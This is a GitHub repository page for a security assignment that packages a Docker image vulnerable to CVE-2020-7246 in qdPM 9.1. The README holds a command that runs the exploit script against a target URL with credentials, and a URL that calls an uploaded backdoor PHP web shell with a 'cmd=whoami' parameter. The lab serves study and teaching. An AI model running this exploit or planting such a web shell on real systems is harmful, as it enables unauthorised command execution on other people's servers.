Skip to content

arafatansari/SecAssignment

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2020-7246 (qdPM 9.1)

For educational purposes only.

See Reference for the details.

Run

$ git clone https://github.com/arafatansari/SecAssignment.git
$ cd SecAssignment
$ docker build -t cve-assignment:ine .
$ docker run -it -p 80:80 cve-assignment:ine
$ service apache2 start | service mysql start

Exploit

$ python Exploit/exploit.py -url http://{target-ip}/qdpm/ -u test@localhost.com -p password

Check (exploited)

$ http://{target-ip}/qdpm/uploads/users/xxxx-backdoor.php?cmd=whoami

About

A Docker image vulnerable to CVE-2020-7246.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published